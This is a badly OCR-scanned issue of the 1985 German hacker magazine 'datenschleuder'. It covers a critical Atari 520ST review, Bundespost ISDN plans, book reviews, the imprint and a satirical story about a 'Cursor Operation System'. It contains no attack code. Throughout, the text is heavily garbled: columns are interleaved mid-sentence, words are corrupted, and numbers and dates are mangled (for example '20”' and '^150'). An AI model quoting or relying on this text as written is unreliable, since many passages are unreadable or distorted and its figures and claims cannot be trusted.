F6-10 eriOfOerliche Handhaltung.
Milten im Kabelwerk standen zwei schwarze Kästen
Es waren elektrische Kleinkrattweike Typ 'sofort weg-
Daß die wenigen Ouadratmeter englisch geliefert wer¬
den. mag noch angehen Jedes BiMigteiefon mit einer
"DRUCKEN IN HONGKONG'.Anleitung ist besser do¬
kumentiert als der 520er. auch wenn dort "freigestellte
werten, wenn Netzkab^ kaputt Atan lormuiieri ge- Singweisengntler autiauchen oder • peim Tanoyteo „„ö Danxe. JKk'
^ ^er BASTARD-Blitz
Lnabhangice Clubzeitschnft öes Bundes flei Alan-ST An¬
wender" nenm sich em neues Biatichen das es C'atis zum
SdP*'eab Actija. lirmenreuiral' darf n.nhi veiges&en wniann
fälliger 'Die Netzleiiung dieses Gerätes kann nicht
ersetzt werden Bei Beschädigung der Leitung Gei-al umrandet" übersetzt wird
the digits are rounded mit "Die Ziffern werden Tiieiacite des Maehwerks m Oaia Becker Naenwuei squaiilai
nicht weiter verwenden ‘
Diese schwarzen Kasten waieneiniacrt zu undboien
dem Neugier-gen kaum Einblick wegen des Siche-
lungskonzepis "Kleben sian Schrauben Da ist man
angeschrmert
Em Kleinkraftwerk hängt an Tastatur mul Rechner
ikabdlose Handhabung wie m den Anzeigen prima
Mil der Tastatur aut dem Senoß geht das Monitorkabei
leicht raus und die Kiste resettet) em Kleinkraftwerk
an der Floppy Nur der Bildschirm bekam Kein schwar¬
zes Kleinkraftwerk mit Watn-Aufschrift Das Netzkabe'
■si auch besser und vermutlich auswechselbar
Das Auspacken und die erste Ihbetnebnahme ist aul
Pin paar Seilen KunsidrucVpapier halbwegs verständ¬
lich beschlieben
Dann gibts noch 72 Seiten LOGÖ-Kram. im Anhang ist
wenigstens der Zeichensalz bekchnepen. Auf Frager
nach Escaoe-Steuersequenzen oder der Ansieuerung
der Mausschnittstelle gibts keine Auskunft.
Statidessen gibts Firmenpotitik. Für etwa 1500 DM
bekommt man ein paar tausend Seiten Doku und
einige Floppies Kurz. Nach Erwerb der Hardware
gibts für den Pieis eines halber Rechners die zum
Betreiben notwendige Doku und Software.
Oie minimale SysiemauTJenverkabeiung betragt rund Trotzderri laßt die Sysiemdoku vieles offen. Es mag ja
i0 Meier •$! aber haipwegs narrensicher Nu' bei Oer
Floppy gioi es em Problem Am Rechner eine Buchse
inn DIN Haibschwergewichi mit der Aufschrift "Floppy
Disc an der Floppy zwei Oie eine heißt IN" und die
arxJete OUT" Das ist das klassische Bedienungsan-
leilungsdilemma Man kannaucheinen Kipplichtschal-
tei oben mil OBEN und unten mit UNTEN beschriften
Das Vettxndungskabel zur Floppy isl produKilonslech-
nisch aus dem Kernspeicher-Zeilalter Damals wurden
durch winzige magnetische Kerne je drei haardünne
Drahte von Hand geladelt Heute müssen wohl bei
Atari Floppykabel von Hand gelotet werden Vielleicht
ist das em Grund für die Lieterverzogerungen
angehen, caß das tückisch« OBeraling System (TOS)
noch nicht ganz ivmMioniert. aber teioei wird nicht
recht deutlich, wie es eigentlich tunkimnieren soll
wenn es fertig ist. Vermutlich itt das noch unklar
Das Ding lauft toll, nur sind die Maröwaretestprogram-
me nicht rechtzeitig fertig geworden Am besten, wir
User schreiben unsere eigener' Die Lieferbedingun¬
gen vom "Händler-Informaltonslag 20 Mai'85' schrei¬
ben in "Anlage 5":
Als Auslallobergrenze lür (einen Sonderrabatt von
2%. ds-Red.) .. werden 27®/. vereinban, danach
tauscht ATARI defekte Gerate aus Verständlich aus-
gedruckt ATARI behalt es sich vor an Händler bis zu
Die angeblich Unabhängige Clubzeitschrift BASTA 27'!'o Schrott ohne Rücknahme oder Entschädigung zu
BLITZ von erlahrencn DATA BECKER fachauioren liefern urfl gewährt dafür ZV» Extraraban
beschuldigt die Post sie sei schuld an den Lieferver- Das haut jeden gm oder ergibt wie Alan formuliert
zogerungen wegen der FTZ-Nummer,. Hier muß die eine hohe Umschlaggeschwindigkeil
Post in Schulz genommw werden denn Irotz erteilter Zur Unterstützung des Abverkaufs' bietet Atari einen
Nummer gibts nicht genügend 520er im Handel. Maiernoienst (Papptatein mit negativer Prägung eines
Das Zerlegen von Tastatur und Rechner war Fummel- Schriftsatzes der Duden) uivJ Nationale Werbung
kram da alles blechmaßig abgeschirmt, verschraubt. Unter Atan-Präsentation findet sich der Punkt Ver-
verklemml und verlötet war Auch hter hat Atari noch Stärkung aes Images": darunter ein LKW-Oidie mit
nicht das rechte ProduWionsknowhow: Snap-In- Atari-Werbung Mehr spater, nicht heute
Gehäuse sind besser und billiger, setzen aber gutes Igt dOCh LOGO^
Oesign und entsprechende Testverfahren voraus.
Oer Videoteil (320424 MHz) im Rechner ist abge- Wie bei Behörden. Alles Ausl^ungssacne
«ie e.n HF-Teil m Fernseher Äul der Unler- Das mlgelieferle Logt) isl vom BeMlsumlanj dürftig
sede der Plat™ IRev. Bl ein Sonoer-R Igb-.i-so-gd- und reagiert aut 5 mit 21.^ Null hoch r,
swi oben ein nachtraglicbei R INull Ohml kein CulS- gel" “^«fsI, ala52013 ws 850929 1937
Jumper Vier ROM-Socket ZU je 32 KB sind noch frei. .
zwe<sindmiie4K88ootsufigt;rülll Das ist der wahre ChaOS-Plane mit dam S
Grund warumdie 128KB-Version nicht auf den Markt CCC-CH wuselt an einer Mailbox ii
mjÄisctiBn xiappl die Kooveruerijnig fu>n FoiQM'.f nalbweg»
nur Uriiscridg und die Kopüeiien »iier Serien werden ini «mem
MjiiixOfucke* aemaent
Aiel Fl und 'Woitgang Sen nanen SueH ftoen zwei mit der
Zeiiscrihn Das redaktionelle Konzeoi ertoroen zafticnde piau-
b>9e Veremsmilglieder 'Alle 6A5tA Miigneder erriaiten die
7eiisr.nrili kneienlos" siehl im impiessunk Mas die Mitglied'
small koslei. steN woanders
Pie Puaiiial der ZeitseririH enispnchi der Aian-Werbung Schon
a^l der Tiielseite eine Hardwarekonipoeiiion die twar lotogen
i»l, aber kein lunMionierendei Ardeiispialz
Die abgecrucxien Texie kennen keine Onaoe
ünier dl Maiibox sient gesenrleben Die Maiibox soii naiuriicn
ai.1 einem ST lauten An dem Konteot arbeiten wir noch, dazu
verraten wir n«h nichts Es wird aber etwas anders aussehen
aal das der bisher üblichen Ua iboien uaßieuch überraschen'
Acht Selen weitei 'Wer kann eme Ma>ibOi icnreioenl
So sehnen v»ie möglich «oHen wr die Ua<ibo> m Sel'ivb
nthrnen. doch woner rch-nen unfl mehl stcmcn®
Eine m 6 geschneoene Ma I9C« aul dem Atan «aie schon eine
lene Sacne Sicher tafti sic"i em solches Programm kucli
kcmmerzieii verwerien Also wer CD'erl sicn’'
Sooo flarl rran das aber nicht lormui'eien Das hat euch Papa
Ciatker wohl noch nichi Deigeorachi' Aper weiter pei der
Maiihox-Solt Für den Arilang leich! abe- auch pin PioqramrTi
lui (len C64 c3d©r den Schneider CPC
Unter soienen umslanden «unde'l es nicnt. «senn Accounts
dl« tur Data Becker gedacht smd nicni mal von ejeren Milar
öeiiern sondern ausschliefti cri von Macke'r> genutzt wenden
sei der Beschreibung des Floppy Disx Anschlusses kommt eine
aktuelle Bescrireipung zürn "moe* PuI'S« Hierüber lau'en oie
iniiiai'Sierunqspuise der Lauhwerkseiektramk im aktiven Zu¬
stand fuhrt dieser Pegel TTL Pege ung smo AK Tiv LOW intern
«vrU ei Ouicn eir-nn 1 hohm Puh-uo-Widerstanc rhach 5V
hochge legt
Das ist -vin aber kem Wuneci br;' C64 JnBin di« vor Besch.n1.
u lästern Aber noch gemeiner isi es eigenes
n linier der Überschritt Erterne Hardware
Chaos-Pläne mit dem 520er
kam Das RAM wäre schon mil dem Betriebssystem
üborfülll gewesen. Denn FloppyTOS umfaßl mehr als
Bayern fluchen übers nicht laufende Kermit. Die Ber¬
liner machen irgendwas uns unklares- Die Harnove-
200 KB und die passen nicht in 1Z8 KB Was in TOS raner wollten noch .Floppies vorbeischicken Es gibt «
drin ist. bfeibl unklar. Erste Untersuchungen erwecken Beschaffungsprobleme: Wer hat eine Bezugsquelle für *2
den Anschein. Jack sei leibhaftig in digitalisierter Form Floppy-Glgadinsiecker? Oanir lassen sich für 500 C ^
drin Er fflud noch ausgetrieDen werden; OS statt TOS.
Oie ffi ^icher-lCs (je 2S€KBit) sind großzügig auf
ÖM dop(^5eitige Vobislloppies anschließen In Ham-
I Floppy-Tests. Man kann die
der Platiiie verteilt und bieten Platz für ein überschau- TÖ^Flopp)/ in einen Aricot reinsiecken. Zwar läßt sie
ln Ham- 3 ^ 3 ^ i- äi
Original Tu ^ § p «
bates Redesign. Gesockelt sind nur die ROMs. der
66190t und der DUA-Harddiskhonlroller sowie die
sich nichi direkt f logisch'} lesen, aber 'physikälisch
das Aufzeichnungstormat wird geschlickt und die
beiden Custom-ICJs in lmn>Afenasockeln.Siesindder Directory-Einträge sind zu finden. Dabei ergab sich,
gegenwärtige Kopierschutz. Soffware. auch flOMs., daß (u.a.) KERMfT vorher drauf war und dann als
lassen sk^ ganz leicht kbpieren. Hardware auch das gelöscht markiert wurde. Jedes an mich ausgelieferte
zeigen die App/e* und IBM-Nachbauten. PALs erfor* gjt gehört mir. oder???
j3erfh.etwas mehr Mühe, aber die lassen sich per Weilers Fftäne werden gerne verraten, da sie am
^^ftSi rg~7»hityäleren. tMbef^Tst^luöh. egal. -Ob das ah«<|«n gemainuim verwirklicht werden.
Je «'SixioS
S J!ħf
(c) datenschleuder 13 ‘ Oktober 1985 * C9927F * Seite 3
Was sind Ihre mickrigen 64 Kilobytes Speicherplatz gegen die Millionen^)0^^
^von Bäumen in unserem Urwald oder die Milliarden von Grashalmen
v _ auf unseren Savannen! _
e Milliarden von !
^ 4r ^t
Post Future?
Im orbitalen Umlauf befinden sich auf geostationärer Bahn M Satelliten des
Inteilsatsystems. mit insgesamt 153000 felelon-urKi 24 Fernsehkanälen. Durch
Satelliten können jeweils 12000 Telefongespräche gleichzeitig übertragen werden
Global gibt es über: SSO mio. Telefonanschlüsse. 1.5 mio. Fernschreiber. 6 mio.
Terminals und rund 1 mio. kommunikatlonsfähige PC's Mehr als 24 mio. Fern-
Sprechhauptanschlüsse entfallen allein aid das Fernsprechnetz der D6P Oie
Telekommunikatiorsdienste der DBP bestehen heute aus getrennten Fernmelde¬
netzen. wie das herkömmliche Fernsprechnetz mit ca. 30 mio. Telefonen, das
Integrierte Text* und Datennetz in digitaler Technik |IDN) swie die lokalen Breit¬
bandverteilnetze für die Übertragung von Ton-und Fernsehprogrammen. Als vor 7
Jahren die Grundsatzentscheidung der DBP fiel, ihr total veraltetes Fernmeldenetz
zu digitalisieren, und die einzelnen Neize zu integrieren, war das herkömmliche
Fernsprechnetz Minelpunkt ihrer Überlegungen. Denn es bringt die wichtigsten
Voraussetzungen eirrer Netzintegration von vornherein mit: es ist das flächenmassig
am dichtesten ausgebaute Netz, es hat bei weitem die grösste Teilnehmerzahl, es
dient der geschäftlichen wie der privaten Kommunikation, seine technischen
Einrichtungen sind vergleichsweise preiswert, es ist weitgehend international
slartdardisiert. Oie Grenzen des Fernsprechnetzes liegen jedoch in seiner einge¬
schränkten Ubertragungskapazilät und -quaiität. Oie Teifnehmeranschlüss« des
Fersprechnetzes und des Integrierten Text und Datennetzes bestehen ausschliess¬
lich aus Kupferkabel, dessen nieder« Leistungsniveau ment die Ansprüche van
Morgen gewährleisten Seit 19S2 ist die 06P nun dabei, die Übertragungssysteme
des regionalen Fernverkehrs zu digitalisieren. Nach Angaben der OBP wird der
Oighaifsierungsgrad 1965 einen Wert von 20% der geschalteten Leitungen nicht
überschreiten. Die Digitalisierung der übertragungssysteme der überregionalen
Verbindungen werden aller Voraussicht 1990 die 50% Klausel erraffen, erst 10
Jahre später im Jahr 2000 hofft man, die 1M% Oigilalisierung hinter sich zu
bringen. Oer vollständige Ausbau des Fernsprechnetzes in digitaler Technik wird
voraussichtlich im Jahre 2020 abgeschlossen werden. Da schon im Normalfall bei
ner OBP alles länger dauert, wird im Ernstfall ein DgitaMsierungaende nicht vor
dem Jahre ^150 zu erwarten sein, was sehr starken Zweitel an demgaruen Projekt
aufkommen lässt. Die Gründe liegen laut DBP in den enormen InrKwations- und
invesiltionsansprüchen dieses ProjeMes. denn allein dos Auswechsetn der rund
6700 Vermiflfungssfeffen des Fernsprechnetzes mit den Mniionen von Leitungen
erfordert Jahrzehnte und Inveslilionen in Milliardenhohe. Oie Vermittlungsstelten
oesitzen für sich allein einen Wiederbeschaffungswert von ca. 40 Mrd. OM-West.
Nach Fertigstellung dieses neuen Fernmeldeneues trägt es den stolzen Namen:
ISDN'. Was für den inlerriational standardisierten Begriff: Iniegrated Services
Digital Network steht. Ziel dieses Schaffens stellt der iSOf^Gasisanschluss dar. bei
dem Uber die herkömmliche Kupterdoppelader der Teiinehmeranschlussleitung in
digitaler Form zwei Nutzkanäle mit je einer Bitrate von 64 kbit/s sowie ein
zusätzlicher Steuerkanal mit 16 kbit/s übermitl^t werden können. Besortderes
Merkmal des ISDN ist. die seit langem erwartete, genormte Teilnehmerschnmstelle.
bezeichnet als " Oie Universalsteckdose "... Was bietet uns. dann Verstorbenen,
das ISON-Projekt? Im ISON-Fernsprechen wird eine bessere Sprachübertragung
gegenüber dem heutigen Fernsprechen garantiert. Beim ISON-Teletex können über
64 kbit/s eine OIN-A4-Seite in weniger als 1 Sekunde statt bisher 3 Sekunden
übertragen werden. Wenn im Jahre 20” BTX noch vorhanden sein sollte, sind die
Benutzer in der Lage über ISDN-Biidschirmp«t schnellere Bildaufbauzeiten zu
genießen. Laut DBP wird es jedoch an dem unüberwindbaren Anpassungsaufwand
m den Sildschirmtextvermittlungsstellen scheitern. Die tSDN-BildübermiRlung er¬
wirkt elwa alle 4 Sekunden ein neues Standbild. Beweglbilder sind im ISDN natürlich
nicht möglich. Aber was kümmert uns. dann in den ewigen Jagdgründen der
Daterwvelt. verstorbenen Hackern und Datentouristen der ganze tSDN-Alptraum?
Was bleibt ist jedenfalls nur die neue Datex-L Verbindung in die USA. die der Gilb
in Zusammenarbeit mit der amerikanischen FernmeidegeseiischaR TRT Teleconv
municaiions Corporation und der Firma Nixdorf Computer AG errichtete. Die 2400
Dit/s Oalex-L Verbindung wurde auf der Hannover-k^sse 1965 eröffnet
created Dy Ooeiix.
Das Redaktionsteam erhielt zum Redaktionsschluß diesen Beitrag Er ist die
Überarbeitung eines älteren Entwurfs für die d$ 11/12, der aber nicht abgedruckt
wurde. Wir bitten um Zuschriften, die wir an den Autoren Weiterleiten
ct isdnobtS.ws 850929 2200
Heyne HalbschnellschuO
Ein amüsantes, aber fachlich unkorrigiertes Bach stanvnl vom Heyrte-Verlag.
Richtig geklappt hat merkwürdigerweise die Datenübertragung eines Maiibox-
verzeichnisses im Arvhang ausgerechnet von der Telebox. so firtd^ sich
unier "Mailboxen in Deutschland" unter dem Eintrag Chaos Computer Club
eine privale Telefonnummer mit dem korrekten Vermerk "Keine Mailbox!'.
Jetztrist sie nicht mehr privat und Nummer der Btx-Redaktion (Notlösung)
Hanen andere Leute ähnliche Probleme?
Beim Lesen finden sich ein paar witzige Personenbeschreibungen, die in
einigen Punkten etwas verwischt sind. Dazu kommt eine Sammlurtg vieler
Hackerstohes. Lästig ist der Personenkult. Bn Oatenschleuder-Leser schreibt
dazu nach einem Vorspann zum Bezugsproblem daienschleuder:
OM (Leider dürfen wir hier den richtigen Preis nicht schreiben, da das sorrst
Werbung wäre. Red ds) gekauft.
Und drin handelt das Ding last nur von Wauibaby. Ist es etwa das? Verschlingt
die Pflege des Personenkults alle Zeit und alles Geld? Oie beiden Autoren
vergaßen zu erwähnen, was man zum Frühstück essen muß. damit man ein
weltberühmter Hacker wird (Falsch. Auf Seite 10 steht '...BuK« lila färben
kann.* Die Autoren besuchten Wau. als er Brötchen mit iiia Butter ur>d Honig
Irühstückte. Red. ds]
Nun gut. Will ich mich langsam wieder abregen. Was wir aber nicht übersehen
wollen jst. daß ich seit der Einladung zum Congress keine ds mehr bekommen
habe. Über den Congress habe ich tatsächlich erst wieder was in diesem
bescheuerten Buch gelesen
Ich wäre euch danktor, wenn ihr meinen Srielkasten. bzw. den Briefkasten
meiner Freundin, demnächst reichlich mit guter Literatur laien wüidet. (Wir
mühen uns redlich. Anm. ds)
Schickt mir fa nicht dieses besemmelte Buch, das ich feider schon habe!
(Versuch es bei Heyne mit einem Garantie-Umtausch. Anm. ds] Gruß. Frank
(Wär nett, wenn Du die Hackerbibel rezensierst. Deine Art gefällt. Besuch ur«
mal. Anm. ds)
Militäreinsatz gegen Hacker
'Wenn es «in Phänomen wie das absolut Bose überhaupt gibt, dann besteht
es darin, emen Menschen wie «in Ding zu behandeln.' (John Brunner)
und doch tun sie es. diese Perfekiionisten. diese entsetzlich tüchtigen Leute,
die mit ihren praz'Se funktionierenden Fischgehirnen Menschen auf SiOckgut.
auf Menschenmatenat. auf Zahlenkombinationen reduzieren, um sie io den
Gritf zu bekommen, um sie als numerische Größen in ihren Kalkülen hand*
haben zu können Wie winzig der Schritt von diesem Denken zum Handeln
ist. Ist Alltag, ^ispiel: Für einen Atomstaai Ist es Kleinkram, ein Schiff von
Greenpeace zu sprengen und dabei einen Fot^ralen zu ermorden. Das gibt
einen Ministerrücktritt. und diejeniggen, die die Presse inforrrtierten werden
bestraft und nicht belohnt.
Noch verfügt kein Land der Welt über den elektronischen Perfektionismus,
wie ihn Brunner im 'Schockwellenreiter* beschreibt. Aber die Zimmermänner
aller Länder bauen daran und wollen, daß wir - angeblich zu unserer
Sicherheit - im Datennetz zappeln
Dann bedarf es nur einer Regierung, die noch viel korrupter und skrupelloser
als unsere ’sl und schrankenlos von diesem Immensen Machtmittel Gebrauch
macht.
Der Schockwellenreiter ist die Geschichte eines ComputerSabotageSpeziali-
sten. der das Wissen der Militärs hat, aber nicht so b^heuert denkt wie
diese und mit seinen Freunden elektronische Bandwürmer auf Regierungs-
Computer losläßt, bis die Mächtigen per Militär an die 'Neutralisierung' gehen.
Das ist keine Buchbesprechung, sondern ein Hinweis auf Pltichtlektüre. Heyr>e
hat das Buch endlich neu aufgelegt (entgegen der MSG in der Kackerbibei).
ISBN 3-453-30584-1. Heyne 0^3667, John Brunner. Der Schockwellenreiter.
Auszuleihen bei jeder Ansammlung von CCCIern.
Die Netzweber
In der ds und der Hackerbibel wurde das Buch "NETWEAVING" erwähnt. Jetzt
ist es aufgetauchl. es war verliehen. Es heißt NICHT 'Netweaving* sorvlem
The Nefweever's Sourcehook. A Guide (o Miere Networking and Cemmunfea-
tfonä und ist von Dean Gengle geschrieben, ln über tO Jahren ist Dean vom
Sys-Op zum Network-Wizard geworden. Er hal das CommuniTree Netzwerk
in San Francisco mit anderen zusammen entwickelt und eine Mertge Erfah¬
rungen gesammelt über die Auswirkungen des Informationszeitatters auf
Kommunikation. Arbeit und Spiele, in The W efweever« SeurcMeek faßt er
dieses Wissen zusammen. Es ist kein leichter, aber wichtiger Statt Stil. Inhalt
und Konsequenz: gut.
ISBN 0-201-0520&-3. Addison-Wesiey. 326 Seiten b:seite4
Nachbemerkung: Da wir neuerdings den Vertrieb der ds aus Kostengrunden
über PostvertriebsstücK machen, dürfen wir nicht die Preise der Bücher
nennen, sonst würde es als Werbung gelten.
buchbe13.ws 850930 0244
Impreesum: datenschleuder 13, September 1985 - Das wisser»chaftliche FachblatI für Datenreisende - O
erscheint achtmal imjahr aiie42(r)Tage - VerlegerundVisdHmbPG:HerwartHo[land-Moritz.5chwerKkesir. •
85. D-2000 Hamburg 20 - Redaktionsadresse ebenda, elektronisch IMCA:CHAOS-TEAM - Eigendruck im co
Selbstverlag - Datenkonvertierung und Salz: BITS - Neue Jahresbezugspreise; DM 60 normal. DM 30
Schüler u. ä.. ab DM 100 Förderabo - die veröffentlichten Beiträge sind urheberrechtlich geschützt, b
Verviellältigungen für gewerbliche Zwecke verpflichten zur Gebührenzahlung an die VG Wort, Abt. Wi., -S
Goetheslr. 49. 8000 München 2 - Weilerverbreitung in kostenlosen elektronischen Informationsdiensten 3
nach den in IMCA, Brett Datenschleuder. veröffentlichten Verbreitungsbedingungen gestaltet — die ds ist ~
abrufbar via IMCA und angeschlossene INTERMAIL-Hosts - COMBOX- CCC.NEV/S - RMI-NET - ZEV - -C
einige Telelonboxen - in Btx '655321 mit Bestellservice - Kopier-Recht (Nachdruckrechl) für rrichl m
gewerbliche Zwecke: Nur einwandfreie Vorlagen der neuesten Ausgate verwenden. Komplett vervieNältigen. ^
Abgabe nur kostenfrei. Auszüge nur mit dem Hinweis "aus datenschleuder 13. C9W7F‘. Oer Zusammenhang. .2
aus dem die Vorlage stammt, sollte erkennbar bleiben. Zwei Belegexemplare an die ds-Redaktion ~
Compuskriple per Post auf Floppy 3,5" MSDOS/TOS/XF, 5 1/4* Sirius/C64nvr802 (nur notfalls IBM) oder ”
papiern. via Datex (nur nach Absprache!) über ZCZC ans CHAOS-TEAM. impresUws 850929 2130 w
Das Cursor Operation System COSY Nr. 13/85
Die Seele eines neuen Cursor
Quelle: Originaltext 29. 07. 65 (c) P.GLASER Erstveröffertlichung COMBOX:FEUiileton
Die EntstehungsgeschicMe von COSY (Cursor Operation System) — Teil I
Ich weite nicM - ich denke, mit der Zeit soll mir
der auch lieber werden.
(Goethe. Die Leiche des jungen Khoerser)
Angetangen hatte alles im Frühjahr 1985 mit
dem stilvollen Hinscheiden einer Grossreche-
nantage: CURSOR LOST waren ihre letzten
Worte gewesen, bevor sie in den hexadezimalen
Hades hinabgefahren war.
Diese schlichten Abschiedswone inspirierten
einen Kreis junger Menschen: Sie hatten sich
zu einem "Autonomen Sink Tank" (AST) zusam¬
mengeschlossen. Man war lange schon mit der
phantasielosen Funktion und dem Erschei¬
nungsbild des landläufigen Cursor Vulgaris un¬
zufrieden gewesen: Ein langweiliger Lichtfieck,
der. wenn er nicht grade blöde blinkte, nichts
weiter als trostlos anzusehen war. Nun gab es,
einen Innovalionsschub: Das Projekt VIC, der
"Virulent Intensiv Cursor", wurde geboren.
Noch in der selben Wixhe begann der AST mit
der Konzeption eines umfangreichen und mul-
lifunktionalen "Cursor Operation Systems" (CO¬
SY}. Optimal anwenderfreundlich, war es als
"Gänzlich Userlos Arbeitende Schalteinheif"
(GULASOI) angelegt. Online sollte es sich als
"Wundersam Aktives Untergrundprogramm"
(WAU) rege verbreiten. Pionierslimmung kam
auf im AST-Labor.
Für die Konstruktion mußte geeignetes
Software-Werkzeug her: "Cursor Art Design"
(CAO). "Cursor Action Modificator* (CAM) uno
"Funny Unusuaf Cursor Kit" (FUCK) wurden in
nachte- und wochenlanger Arbeit entwickelt.
Dazu bediente der AST sich eines eigens für
diesen Zweck spezifizierten Codes, des "Cursor
Oriented Language Assembler" ((X)LA) mit ein¬
gedickter Fliesskomma-Konsislenz und einer
an Andy Warhol ohenlierlen Grafik-
Befehlsleiste.
Ende März, in der zunehmenden Fröhsommer-
wärme, wurde der erste Satz CURSOR ERRORS
erstellt und pleiziert. Fortran konnten, über das
CURSCDR LCföT hinaus, angezeigl werden:
CURSOR RESTS ERROR
(t«i gewerkschaftlich organisiertem Cursor),
zuzüglich eines ausführlichen Hinweises auf die
kf^leküwertralich vereinbarten Ruhezeiten.
CURSOR HAPPY ERROR
verbunden mit einem unkontrollierbar und kaut¬
schukhaft über den Bildschirm hüpfenden Cur¬
sor. Meist Vorzeichen für das baldige Erschei¬
nen eines weiblichen Cursor (HERSOR).
CURSOR HYSTERIC ERROR
verbunoen mit einem unregelmässig und hoch¬
frequent pulsenden Cursor und Quietschgeräu¬
schen. Meist Vorzeichen für das baldige Ver¬
schwinden eines weiblichen Cursor.
CURSOR OUT OF GAS
(nur bei benzin- und dieselgetriebenem Cursor).
Sollte kein Tank-File vorhanden sein, kann man
das Zeichen vor den Cursor setzen und ihn
damit anschieben.
CURSOR OUT OF SENSE
Ein heikles Problem: Der Cursor Ist in eine
Sinnkrise veHallen und hockt dumpf brütend in
Spalte 0 einer beliebigen Zeile am Biidschirm-
rand.
CURSOR COLLAPS (N)
wobei (N) eine Countdown-Variable Ist. die den
geschätzten Zeitpunkt bis zur Disfunidion des
Cursors in sec. anzeigt. Inzwischen hatte auch
die Erweiterung der Gralikroutinen grosse Fort¬
schritte gemacht Je nach Art des Anwender¬
programms und des User-lnput-Verhaltens ver¬
mochte der Cursor nun selbstständig in Modifi¬
kationen zu verzweigen (von denen einige zur
Dominanz über das gesamte aktuelle Programm
führen). Endlich konnte der Cursor zeigen, was
in ihm steckt Die AST-Grafikspeziaiisten nahen
6 zentrale Routinen erarbeitet, die am T.Juni
zusammen mit den neunen Fehlermeldungen als
Version COSY 0.1 den ersten erfolgreichen
Probelauf absolvierte. Zur Feier des Tages
genehmigte man sich eine Flasche Frustschutz-
mittel und rauchte dafür etwas weniger.
DOKUMENTATION
COSY Cursor Grafik Routinen
CURD (Cursor Demoliert)
COSY besitzt ein internes Zählregister welches
fesihäii. wann ein User den Cursor allzu ruppig
gegen den Bildschirmrand knallt. Sind mehr als
sieben Versiösse registriert, wird ein zuneh¬
mend zerbeulter Cursor abgebildet, verbunden
mit einem Hinweis auf seinen abnehmenden
Wiederverkaufswerl. Vor dem 14.Verstoss wird
eine Liste von Gebrauchtcursor-Shops ausge-
geben und vor einem bevorstehenden CURSOR
COLLAPS gewarnt
CUFF (Cursor Diffundiert)
Wird der Cursor zu sehr abgehetzt (Schnellsuch-
läufe, OFU über 1200 Baud u.ä.). löst er sich in
ein unscharfes Feld auf und verounsteischiiess-
lich. CUFF gehört zu den Funktionen, die gege¬
benenfalls auch aus dem COSY-eigenen Zufalls-
generator (COZ) aufgerufen werden. Zur Rück¬
gewinnung des diffundierten Cursors muss das
ebenfalls vom AST entwickelte Steckmodul CU¬
RARE (Cursor Artificial Recreator)verwendet
werden. Man erhält damit einen einwandfreien,
nagelneuen Cursor, muss allerdings in Kauf
nehmen, dass dafür das jeweilige Anwender¬
programm diffundiert
EXCURS (E]q>andierender Cursor)
Eine Funktion, die dem Timeout bei der Daten¬
fernübertragung ähnelt. Erfolgt innerhalb von
60 Sekunden im aktuellen Programm keine
halbwegs vernünftige Eingabe, b^innt der Cur¬
sor sich im Pulstgkt aufzublähen. Ist der Com¬
puter. ergänzend zu COSY. mit einem
FLAUSCHWERK ausgestattet, hilft der Befehl
REBLAEH. Hat der Cursor das ganze ßild-
schirmformat ausgelüllt, kann nur noch CURA¬
RE benutzt werden.
WRISC (Wrlgley’s Spearmint Cursor)
Eine Spezialroutine für die Textverarbeitung;
Wenn der erste Buchstabe eines eingegebenen
Textes sich in dem Text zum 33.MaI wiederholt.
bleibt der Ctursor daran kleben. Er lässt sich
weiterhin frei bewegen, zieht aber, ausgehend
von der Position des Buchstaben, inverse Strei¬
fen hinter sich her. Lässt man die Cursorlasten
los. schnellt das Cursorband wieder auf die
Buchstabenmarke Zurück.
PACUR (Paeman Cursor)
Eine Spezialrouline für das freie Programmie¬
ren, Sind dem Programmierer gerade einige
besonders geschickte Algorilhmen eingefallen,
kann COSY via COZ von Fall zu Fall PACUR
aktivieren. Eingeleitel wird die Funktion durch
die Meldung SYNTAX TERROR- Anschliessend
werden mit einer Geschwindigkeit von einer
Zeile pro Sekunde die letzten 2(X) Programm¬
zeilen wieder weggefressen. Ist die Hardware
mit einem Tongenerator ausgestattet. erkennt
man den Abschluss einer PACUR-Aktion an
einem leisen Rülpsen.
SCHWANG (Schwanensee Cursor)
Im Anschluss an CURSOR COLLAPS 10) wird
SCHWANG au^erufen. die dramatische Darstel¬
lung eines sterbenden Cursor, Die Abflachen
der Blinkfrequenz bis zum agonischen Stillstand
des Cursor, gefolgt von einem letzten Aufbäu¬
men in Karoposition und einer Pirouette. An¬
schliessend Klappt der Cursor nach unten und
baumelt an der imaginären Zeileniinie. verliert
schliesslich mit der einen, dann auch mit der
anderen Ecke den Halt und trudelt entseelt und
wie ein herbstlich leichtes Birkenblatt nach dem
unteren Bildschirmrand. eaiywUM asosjo irce
Schönheit in Wallen
Zehn Stories von Peter Glaserr
Peier wuchs als Bieisuli m Grat (Osiarreieh) awi. «yo die
r>r>chwenigen Schnnsieiier für den Expon nergesiem wer¬
den. Er lebt seit drei Jahren als word »rocessor und
"{»«tronic"-Programmierer m Hamburg Er hat sein Zim¬
mer um seinen CS4 drumrumgestaliel. Er will die Lyriker
wegraiionarisieren und «erscrxcki Floppies Ijr Dichterle¬
sungen. Das SASiC-Gelühf in der MacKerbibel beschreibt
diese Entwicklung.
In der 'Scftönheil in Waffen* sind zehn Siones aus den
leUlen xwei Jahren versammelt, die mit treffsicherer Ironie
all das behandeln, was uns angehi: die Zukunft des
Hackens. Liebessirmilationen mit roter Präzision, Dreiecks-
beziehungen m Was Halt*, Lenesome Heroes m *Ein
Mann bei sich'odercomic-lika Geschichten von Großstadt.
Laridschafl und den Sehnsüchten der Menschen am Ende
des 20. Jahrhunderts. Die Medienkulle faßt er kurz zusam¬
men: 'Der Bildschirm, das Lagerfeuer des 20. Jahrhun¬
derts. und davor; der Mensch der SiiziurrvZeit. unverän¬
dert: der vor dem Feuer hockende Mensch der Steinzeit,
der schnaufend Nahrung m seinen Mund schaufelt und m
das magische Flackern schaut."
Oder: 'Wie Verhaltensforscher mit einer Affenfamiiie, so
leben wir mn den großen Automaten und seinen An hagsem
und beobachten. Das erste Wichtige ist. 'wie* leder von
uns mit der Maschine lebt: wie sein Empfinden und sem
Verhalten sich färbt: wie neue Mythen entstehen, neuer
Alllag vorgeht "
Und gleich online gehen mit dem Bucn -
Poetromc für die Jackentasche.
PETER GLASER. SCHÖNHEIT IN WAFFEN.
10 Stories mit Illustrationen von Chris Scheuer.
Graz (die feinen Punkte in seinen Pinselzeich¬
nungen macht er mit einem einhaarigen!)
Ktepenheuer & Witsch. ISBN 3462017314
kiwipglS.ws 850930 1722
